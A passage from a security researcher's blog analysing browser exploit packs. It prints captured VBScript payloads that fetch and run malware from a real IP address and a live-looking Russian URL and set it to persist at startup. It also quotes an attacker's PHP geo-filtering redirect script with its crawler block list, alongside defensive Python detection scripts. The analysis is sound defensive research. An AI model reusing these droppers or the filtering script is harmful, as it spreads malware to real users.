shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get a1.exe C:\RECYCLER\a1.exe>>C:\RECYCLER\fp.dw&echo get arp2.exe C:\RECYCLER\arp2.exe>>C:\RECYCLER\fp.dw&echo get fa2.exe C:\RECYCLER\fa2.exe>>C:\RECYCLER\fp.dw&echo get cgud.exe C:\RECYCLER\cgud.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q&copy C:\RECYCLER\fa2.exe C:\docume~1\alluse~1\「开始」菜单\程序\启动\fa2.exe&copy C:\RECYCLER\arp2.exe C:\docume~1\alluse~1\「开始」菜单\程序\启动\arp2.exe&start C:\RECYCLER\fa2.exe&start C:\RECYCLER\a1.exe&start C:\RECYCLER\cgud.exe&C:\RECYCLER\arp2.exe&del C:\RECYCLER\fp.exe",0
end function
</script>
</code></pre>
<br />
Another variant of the exploit payload is shown below. It highlights exactly how HTTP requests are issued using AJAX and MSXML2 to download the malware (<b>http://natmasla.ru/ath/sploit/natmasla.exe, this link might be active</b>) directly; VBScript calls are then used to execute the malware.<br />
<br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: 100%; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
<script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "cmd.exe", "/c CD %TEMP%&
@echo
Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>wUnlRLZR.vbs&
@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>wUnlRLZR.vbs&
@echo
objXMLHTTP.send()>>wUnlRLZR.vbs&
@echo If objXMLHTTP.Status=200 Then>>wUnlRLZR.vbs&
@echo Set objADOStream=CreateObject(""ADODB.Stream"")>>wUnlRLZR.vbs&
@echo objADOStream.Open>>wUnlRLZR.vbs&
@echo objADOStream.Type=1 >>wUnlRLZR.vbs&
@echo objADOStream.Write objXMLHTTP.ResponseBody>>wUnlRLZR.vbs&
@echo objADOStream.Position=0 >>wUnlRLZR.vbs&
@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>wUnlRLZR.vbs&
@echo objADOStream.Close>>wUnlRLZR.vbs&
@echo Set objADOStream=Nothing>>wUnlRLZR.vbs&
@echo End if>>wUnlRLZR.vbs&
@echo Set objXMLHTTP=Nothing>>wUnlRLZR.vbs&
@echo Set objShell=CreateObject(""WScript.Shell"")>>wUnlRLZR.vbs&
@echo objShell.Exec(""%TEMP%\natmasla.exe"")>>wUnlRLZR.vbs&cscript.exe %TEMP%\wUnlRLZR.vbs&del %TEMP%\wUnlRLZR.vbs", "", "open", 0
end function
</script>
</code></pre>
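Both payload variants share a handful of traits that are easy to match statically: a shell object created from VBScript, cmd.exe invoked with /c, a hidden window, process-killing, an FTP script written with echo, or an MSXML2.XMLHTTP download saved through ADODB.Stream. The Python scanner below is an added example for this post (it is not the authors' code): it pulls every VBScript block out of an HTML page, scores it against those indicators, and extracts the IP addresses and URLs the block would contact, so a web-proxy log or a crawled page can be triaged without executing anything. The sample page is constructed from shortened fragments of the two variants quoted above; the host 104.152.215.90 and the natmasla.ru URL are the ones printed in this post.<br />
<br />
```python
import re

# Indicator regexes derived from the two payload variants quoted above; each is
# applied case-insensitively to the body of one VBScript block.
INDICATORS = {
    "shell-object": r'createobject\s*\(\s*"(wscript\.shell|shell\.application)"\s*\)',
    "cmd-/c": r'cmd\.exe"?\s*,?\s*"?(/q\s+)?/c\b',
    # shell.run "...",0  and  ShellExecute ..., "open", 0  both hide the window
    "hidden-window": r'(\.run\s+"[^"]*"\s*,\s*0\b|"open"\s*,\s*0\b)',
    "taskkill": r'taskkill\s+/f\s+/im\s+\S+',
    "ftp-script-dropper": r'echo\s+open\s+\S+\s*>',
    "msxml-download": r'msxml2\.xmlhttp',
    "adodb-savetofile": r'(adodb\.stream|\.savetofile)',
    "on-error-resume-next": r'on\s+error\s+resume\s+next',
}
SCRIPT_RE = re.compile(
    r'<script[^>]*(?:language\s*=\s*"?vbscript"?|type\s*=\s*"?text/vbscript"?)[^>]*>(.*?)</script>',
    re.I | re.S,
)
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.I)
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

# Constructed sample page: shortened fragments modelled on the two variants above,
# plus one harmless JavaScript block that must be ignored.
SAMPLE_HTML = r'''<html><body>
<script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw",0
end function
</script>
<script language="VBScript">
function runmumaa()
set shell=createobject("Shell.Application")
shell.ShellExecute "cmd.exe", "/c CD %TEMP%&@echo Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>x.vbs&@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>x.vbs&@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>x.vbs&cscript.exe x.vbs", "", "open", 0
end function
</script>
<script type="text/javascript">var benign = 1;</script>
</body></html>'''


def scan_vbscript(html):
    """Return one finding per VBScript block: indicators hit, score, verdict and network IoCs."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        hits = [name for name, rx in INDICATORS.items() if re.search(rx, body, re.I)]
        # loopback addresses only appear in "ping 127.0.0.1 -n N" sleep tricks, not as IoCs
        ips = [ip for ip in dict.fromkeys(IPV4_RE.findall(body)) if not ip.startswith("127.")]
        urls = list(dict.fromkeys(URL_RE.findall(body)))
        score = len(hits)
        findings.append({
            "indicators": hits,
            "score": score,
            "verdict": "malicious" if score >= 3 else "suspicious" if score else "clean",
            "ips": ips,
            "urls": urls,
        })
    return findings


if __name__ == "__main__":
    for i, f in enumerate(scan_vbscript(SAMPLE_HTML), 1):
        print(f"block {i}: {f['verdict']} (score {f['score']}) {f['indicators']}")
        print("   ips :", f["ips"])
        print("   urls:", f["urls"])
```

The threshold of three indicators is deliberately conservative: a single createobject("wscript.shell") shows up in legitimate intranet pages, but a hidden cmd.exe together with taskkill or an XMLHTTP-plus-ADODB download sequence does not. Extracted IPs and URLs feed straight into proxy blocklists or a retro-hunt across web logs.<br />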
<br />
Publicly available exploits can be tweaked easily, as discussed in the case study above. It is really interesting to analyze the types of payloads and exploits used in the wild for exploiting browser vulnerabilities.<br />
<br />
<b>Inference:</b> Openly available exploits are restructured by the attackers and used in BEPs to trigger infections.<br />
<br />Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-48121715107678734182015-02-22T19:43:00.001-08:002015-03-01T22:06:40.273-08:00A Case Study of Geo-location Filtering and Dedicated Malware Infections !<div class="separator" style="clear: both; text-align: center;">
<a href="http://blog.thesecurityawarenesscompany.com/wp-content/uploads/2013/08/android-geolocation-143.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://blog.thesecurityawarenesscompany.com/wp-content/uploads/2013/08/android-geolocation-143.jpg" height="100" width="200" /></a></div>
<div>
It is a well-known fact that the majority of infectious code (iframes redirecting to browser exploit packs) is hosted on free domains or on compromised websites that are sold in the underground community. In my earlier presentation at the Virus Bulletin Conference (<a href="http://secniche.org/presentations/virus_bulletin_barcelona_2011_adityaks.pdf" target="_blank"><b>HERE</b></a>), I discussed the IP Address Logging Detection Trick (IPLDT), which basically allows attackers to restrict the spread of malware to a dedicated audience on the Internet. For more about BEPs, read the previous research papers:</div>
<div>
<br />
<ul>
<li><b>Styx Exploit Pack - <a href="http://secniche.org/released/VB_Styx_Exploit_Pack.pdf" target="_blank">http://secniche.org/released/VB_Styx_Exploit_Pack.pdf</a></b></li>
<li><b>Sweet Orange Exploit Pack - <a href="http://secniche.org/released/VB_SWEET_ORANGE_EXP_AKS_RB_RJE.pdf" target="_blank">http://secniche.org/released/VB_SWEET_ORANGE_EXP_AKS_RB_RJE.pdf</a></b></li>
</ul>
<br />
A simple work flow is discussed below:</div>
<div>
<ul>
<li>The user visits the website serving the infectious code.</li>
<li>The infected website triggers the custom code hosted by the attacker to check the following:</li>
<ul>
<li>Geo-location of the IP address: if the geo-location of the end-user's IP address maps to one of the locations listed in the configuration file, the user's browser is redirected to the BEP for exploitation.</li>
<li>Whether the exploit code has already been served to this IP: if the database shows that the IP has been served already, the end-user's IP address is filtered and the BEP URL is not served.</li>
</ul>
<li>When the user's browser lands on the BEP URL, a specific vulnerability in the browser (built-in components or plug-ins) is exploited to download malware.</li>
</ul>
</div>
<div>
<div>
In addition, filters are also added for various automated spiders, restricting access by bots (spiders) so that the malicious website or its links do not appear in search results. Recently, I was analyzing a malicious website that was serving infectious code and redirecting the user's browser to a BEP, which downloads malware by exploiting a specific vulnerability. However, the name of the exploit kit is not known. This analysis concentrates on the compromised website that performs the redirection of the user's browser to the BEP.<br />
<br />
A code snippet extracted from the infected website is presented below. It clearly shows that the user-agent and the IP geo-location ("CH" = Switzerland, "DE" = Germany) are used as filters on incoming HTTP traffic. Additionally, two files are generated as databases of the IP addresses that were either successful (sbase.txt) or unsuccessful (sbase_bad.txt) in getting the direct link to the BEP URL from the infected website.</div>
</div>
<div>
<br /></div>
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"><?php
error_reporting(0); ini_set('display_errors',0); // keep PHP silent so no error text ever reaches the visitor
// true when the user-agent or IP matches any regex in the crawler blacklists (one regex per line)
function is_bot($myuagent, $myip) {
$uagents = file('uagents.txt',FILE_IGNORE_NEW_LINES);
$ips = file('ips.txt',FILE_IGNORE_NEW_LINES);
foreach ($uagents as $exp) {
if (preg_match('/'.$exp.'/i',$myuagent)) {
return true;
}
}
foreach ($ips as $exp) {
if (preg_match('/'.$exp.'/',$myip)) {
return true;
}
}
return false;
}
<b>$countries = "CH;DE"; </b> // only visitors geo-located in these countries are sent to the BEP
// page with the exploit (the original Russian comment was mis-encoded; reconstructed)
$good_link = "./banner.php";
// decoy page (reconstructed likewise)
$bad_link = "./blabla.php";
//
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
<b> $file = fopen("./sbase.txt","a+"); // addresses that have already been sent to the BEP
$file2 = fopen("./sbase_bad.txt","a+"); </b> // ip|user-agent of every visitor that was turned away
$already_showed = FALSE;
while (!feof($file)) { // one exploit attempt per address: look this visitor up in sbase.txt
$buffer = fgets($file);
$ip2 = $ip."\r\n";
if(strcmp($buffer,$ip2)==0) $already_showed = TRUE;
}
if (is_bot($_REQUEST['useragent'], $ip)) $already_showed = TRUE; // note: tests a request parameter, not the real User-Agent header
if($already_showed) {
include($bad_link);
} else {
require_once('./geoip/geoip.inc'); // MaxMind legacy GeoIP library
$gi = geoip_open("./geoip/GeoIP.dat",GEOIP_STANDARD);
$ccode = explode(";",$countries);
$show = FALSE;
foreach($ccode as $value) {
// the country must match AND the browser must look like IE, Opera or Firefox
if(geoip_country_code_by_addr($gi,$ip) == $value && preg_match('/(msie|opera|firef)/i', $ua)) {
$show = TRUE;
fwrite($file,$ip."\r\n"); // remember the address so it is never served twice
}
}
geoip_close($gi);
if($show) {
include($good_link);
} else {
fwrite($file2,$ip."|".$ua."\r\n"); // log the rejected visitor
include($bad_link);
}
}
fclose($file);
?> </code></pre>
<br />
On checking the two files, the following stats were gathered:<br />
<ul>
<li><b>Approximately 5881 unique IP addresses (users' browsers) were successfully redirected to the BEP.</b></li>
<li><b>Approximately 15737 unique IP addresses (users' browsers) were restricted from visiting the BEP.</b></li>
</ul>
<div>
The list of banned user-agents is shown below:</div>
<div>
<br /></div>
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> Ask\s*Jeeves
HP\s*Web\s*PrintSmart
HTTrack
IDBot
Indy\s*Library#
ListChecker
MSIECrawler
NetCache
Nutch
RPT-HTTPClient
rulinki\.ru
Twiceler
WebAlta
Webster\s*Pro
www\.cys\.ru
Wysigot
Yahoo!\s*Slurp
Yeti
Accoona
CazoodleBot
CFNetwork
ConveraCrawlerDISCo
Download\s*Master
FAST\s*MetaWeb\s*Crawler
Flexum\s*spider
Gigabot
HTMLParser
ia_archiver
ichiro
IRLbot
Java
km\.ru\s*bot
kmSearchBot
libwww-perl
Lupa\.ru
LWP::Simple
lwp-trivial
Missigua
MJ12bot
msnbot
msnbot-media
Offline\s*Explorer
OmniExplorer_Bot
PEAR
psbot
Python
rulinki\.ru
SMILE
Speedy
Teleport\s*Pro
TurtleScanner
User-Agent
voyager
Webalta
WebCopier
WebData
WebZIP
Wget
Yandex
Yanga
Yeti
msnbot
spider
yahoo
jeeves
google
altavista
scooter
av\s*fetch
asterias
spiderthread revision
sqworm
ask
lycos.spider
infoseek sidewinder
ultraseek
polybot
webcrawler
robozill
gulliver
architextspider
yahoo!\s*slurp
charlotte
ngb
</code></pre>
<div>
<b><br /></b></div>
A number of IP addresses with their respective user-agent strings are presented below; these visitors were not allowed to load the BEP URL in the browser for exploitation.<br />
<br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> 77.120.162.20|Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.16
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
194.124.140.39|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
41.249.252.199|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
46.126.65.93|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
194.179.92.135|Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
93.199.31.78|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; tb-webde/2.6.0; rv:11.0) like Gecko
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
188.63.105.11|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
84.253.30.110|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
194.179.92.135|Mozilla/4.0 (compatible;)
189.19.165.228|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
66.102.6.183|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.68 Safari/537.36
66.249.93.223|Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14
81.62.35.97|Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
195.78.246.18|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
</code></pre>
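The workflow and the PHP snippet above can be replayed offline to see exactly which branch turned each of these visitors away. The Python script below is an added example written for this post (it is neither the attacker's code nor the post's own): it reimplements the decision order of the PHP filter (crawler blacklist, one-hit-per-IP, country, browser family) and labels each ip|user-agent entry with the reason it landed in sbase_bad.txt. The entries are copied from the sample above; the served-IP set and the country table are constructed stand-ins for sbase.txt and GeoIP.dat, so the country codes are not real GeoIP results. One point the replay makes obvious: the browser regex (msie|opera|firef) matches neither Chrome nor IE11, whose user-agent carries "Trident/7.0; rv:11.0" and no "MSIE" token, so those visitors were filtered even from the targeted countries.<br />
<br />
```python
import re
from collections import Counter

# Filter parameters quoted from the PHP snippet above.
TARGET_COUNTRIES = {"CH", "DE"}                        # $countries = "CH;DE"
TARGET_BROWSER = re.compile(r"(msie|opera|firef)", re.I)
# A short subset of the banned user-agent regexes from uagents.txt (one regex per line).
BANNED_UA_PATTERNS = [r"Yahoo!\s*Slurp", r"msnbot", r"Wget", r"Python", r"google", r"spider", r"Java"]

# Constructed stand-ins for the two state files and for GeoIP.dat:
#   SBASE_GOOD - addresses already handed the BEP link (sbase.txt)
#   GEO        - made-up country codes for the demonstration, NOT real GeoIP results
SBASE_GOOD = {"194.179.92.135"}
GEO = {"77.56.219.66": "CH", "213.14.101.210": "DE"}

# Entries in the sbase_bad.txt layout (ip|user-agent), copied from the sample above.
SBASE_BAD = """\
77.120.162.20|Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.16
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
194.179.92.135|Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
194.179.92.135|Mozilla/4.0 (compatible;)
66.249.93.223|Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14
"""


def is_bot(ua, patterns=BANNED_UA_PATTERNS):
    """preg_match('/<pattern>/i') over every line of uagents.txt; the ips.txt list is omitted here."""
    return any(re.search(p, ua, re.I) for p in patterns)


def classify(ip, ua, served_ips=SBASE_GOOD, geo=GEO):
    """Replay the PHP decision for one visitor and name the branch that decided it.

    Unlike the original, which tested $_REQUEST['useragent'] (a request parameter
    that is normally absent), this checks the real User-Agent string.
    """
    if is_bot(ua):
        return "bot-ua"                      # crawler/scanner: decoy page, keeps the site out of search results
    if ip in served_ips:
        return "already-served"              # one exploit attempt per address (IPLDT)
    if geo.get(ip) not in TARGET_COUNTRIES:
        return "country-not-targeted"        # outside CH/DE, or no lookup result: decoy page
    if not TARGET_BROWSER.search(ua):
        return "browser-not-targeted"        # Chrome and IE11 (no "MSIE" token) never see the BEP
    return "served"                          # this visitor would receive the BEP link


def classify_file(text, served_ips=SBASE_GOOD, geo=GEO):
    """Parse ip|user-agent lines and return [(ip, reason), ...] in file order."""
    rows = []
    for line in text.splitlines():
        if "|" not in line:
            continue
        ip, ua = line.split("|", 1)
        rows.append((ip.strip(), classify(ip.strip(), ua.strip(), served_ips, geo)))
    return rows


def count_reasons(rows):
    """How many rejected visitors fell into each branch."""
    return dict(Counter(reason for _, reason in rows))


if __name__ == "__main__":
    rows = classify_file(SBASE_BAD)
    for ip, reason in rows:
        print(f"{ip:16} {reason}")
    print(count_reasons(rows))
```

For an incident responder the per-branch counts are the useful output: a large "browser-not-targeted" bucket means a modern browser population was never exposed, while "already-served" entries identify the addresses that did receive the exploit page once and should be checked for a follow-on download.<br />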
<br />
Inference: <b>BEPs extensively use IPLDT to manage infections and to ensure that the malicious code is served only to the targeted countries.</b><br />
<br />Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-79632620774436675722015-02-08T10:54:00.000-08:002015-02-08T10:54:54.297-08:00Virus Bulletin Paper - Prosecting the Citadel botnet !Virus Bulletin published earlier our research on Citadel. Check the links:<br />
<ul>
<li>Prosecting the Citadel botnet - revealing the dominance of the Zeus descendent: part one : <a href="https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-1"><b>https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-1</b></a> </li>
<li>Prosecting the Citadel botnet - revealing the dominance of the Zeus descendent: part two : <b><a href="https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-2">https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-2</a> </b></li>
</ul>
<br />
Full PDF paper : <a href="https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf"><b>https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf</b></a>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-68538390443924825412014-08-24T08:41:00.001-07:002014-08-24T08:42:15.910-07:00BlackHat 2014 - Botnet C&C Panel TalkWhitepaper: <b><a href="http://secniche.org/blackhat-2014/blackhat_2014_briefings_whitepaper_exp_cc_flaws_adityaks.pdf">http://secniche.org/blackhat-2014/blackhat_2014_briefings_whitepaper_exp_cc_flaws_adityaks.pdf</a></b> <br><br>
<center><iframe src="//www.slideshare.net/slideshow/embed_code/37829873" width="427" height="356" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> </center>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-83971907364709744182014-04-15T21:24:00.002-07:002014-06-11T22:29:03.002-07:00Targeted Cyber Attacks Book - Syngress !<div class="separator" style="clear: both; text-align: left;">
<b>Update: A very insightful review of the book published in Network Security.</b></div>
<br />
<iframe allowfullscreen="" frameborder="0" height="511" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/35777411" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px; max-width: 100%;" width="479"> </iframe> <br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/adityaks/network-security-book-review-targeted" target="_blank" title="Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood">Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood</a> </strong></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-9qVr5G7PmSU/U04ARXTY5UI/AAAAAAAABso/Yw5tq6I3FQA/s1600/book_cover.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-9qVr5G7PmSU/U04ARXTY5UI/AAAAAAAABso/Yw5tq6I3FQA/s1600/book_cover.png" height="200" width="136" /></a></div>
I started sketching this book about a year ago when I was invited by Syngress for this project, based on my previous work on crimeware research. Thanks to the Syngress and Elsevier team for this step. Due to my ongoing job and commitments the project got delayed, but eventually the book is about to be published on 18th April. The first edition of the book is dedicated to readers who are interested in understanding the artifacts of targeted cyber-attacks and their associated components. Personally, I would like to thank all the researchers and journalists who reviewed the book and provided positive feedback.<br />
<b><br /></b>
<b>Introduction</b>: Cyber-crime increasingly impacts both the online and offline world, and targeted attacks play a significant role in disrupting services in both. Targeted attacks are those that are aimed at a particular individual, group, or type of site or service. Unlike worms and viruses that usually attack indiscriminately, targeted attacks involve intelligence-gathering and planning to a degree that drastically changes their profile.<br />
Individuals, corporations, and even governments are facing new threats from targeted attacks. Targeted Cyber Attacks examines real-world examples of directed attacks and provides insight into what techniques and resources are used to stage these attacks so that you can counter them more effectively.<br />
<br />
The book is available to be ordered at the following places:<br />
<ul>
<li><b>Amazon:<a href="http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits/dp/0128006048" target="_blank"> http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits/dp/0128006048</a></b></li>
<li><b>Kindle Edition: <a href="http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits-ebook/dp/B00JRVB3UY" target="_blank">http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits-ebook/dp/B00JRVB3UY</a></b></li>
<li><b>Elsevier: <a href="http://store.elsevier.com/Targeted-Cyber-Attacks/Aditya-Sood/isbn-9780128006047/">http://store.elsevier.com/Targeted-Cyber-Attacks/Aditya-Sood/isbn-9780128006047/</a></b></li>
<li><b>Barnes and Noble: <a href="http://www.barnesandnoble.com/w/targeted-cyber-attacks-aditya-sood/1118602703?ean=9780128006047">http://www.barnesandnoble.com/w/targeted-cyber-attacks-aditya-sood/1118602703?ean=9780128006047</a></b></li>
</ul>
<b>Note:</b> Elsevier Store will offer electronic versions that are readable on Kindles in PDF and MOBI format.<br />
<br />
Enjoy !Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-2720273338377073352014-02-27T17:12:00.001-08:002014-03-05T07:47:52.620-08:00Gmail Phishing Attack - Why the Anti-spam Solutions Fail to Trigger ?<div class="separator" style="clear: both; text-align: left;">
<b>Update: 5th March, 2014</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Note: I am concerned because it got delivered to my personal gmail inbox -:)</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
It looks like the phishing attack on Gmail users discussed earlier (a week ago) is still underway. Although the attack is public now, the endpoint security solutions deployed by Google still fail to mark the emails as phishing. The latest snapshot of this attack is presented below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Links: </div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><b>hxxp://croydon.com.br/phpthumb/serv/serv/Login.htm </b></li>
<li><b>hxxp://croydon.com.br/phpthumb/serv/serv/badu.php</b></li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-QEXpo0qw0P8/UxdC9RHeYyI/AAAAAAAABqk/dn3ExaD0QUc/s1600/gmail_phishin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-QEXpo0qw0P8/UxdC9RHeYyI/AAAAAAAABqk/dn3ExaD0QUc/s1600/gmail_phishin.png" height="362" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The host has a history of malicious activity, though: <a href="https://www.virustotal.com/en/ip-address/187.17.98.129/information/" target="_blank"><b>https://www.virustotal.com/en/ip-address/187.17.98.129/information/</b></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Depending heavily on Safe Browsing to blacklist phishing websites is not reliable; prevention has to be triggered at the point of origin. Let's see how long this continues. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
-------------------------------</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A recent targeted phishing attack has been launched against gmail.com users. Interestingly, the email slipped through Google's endpoint security solution, which failed to detect the spam email and delivered it straight to the user's inbox.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-XYfapbkFAeY/Uw_XdilOxcI/AAAAAAAABp0/6e8giBH5aX8/s1600/gmail_attack_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-XYfapbkFAeY/Uw_XdilOxcI/AAAAAAAABp0/6e8giBH5aX8/s1600/gmail_attack_1.png" height="128" width="640" /></a></div>
<br />
<div>
Visiting the link results in the following webpage, which shows the same layout as Gmail. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-XGWYbMZMqIs/Uw_YikSBLpI/AAAAAAAABp8/TjgZUvQaITM/s1600/gmail_attack_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-XGWYbMZMqIs/Uw_YikSBLpI/AAAAAAAABp8/TjgZUvQaITM/s1600/gmail_attack_2.png" height="430" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
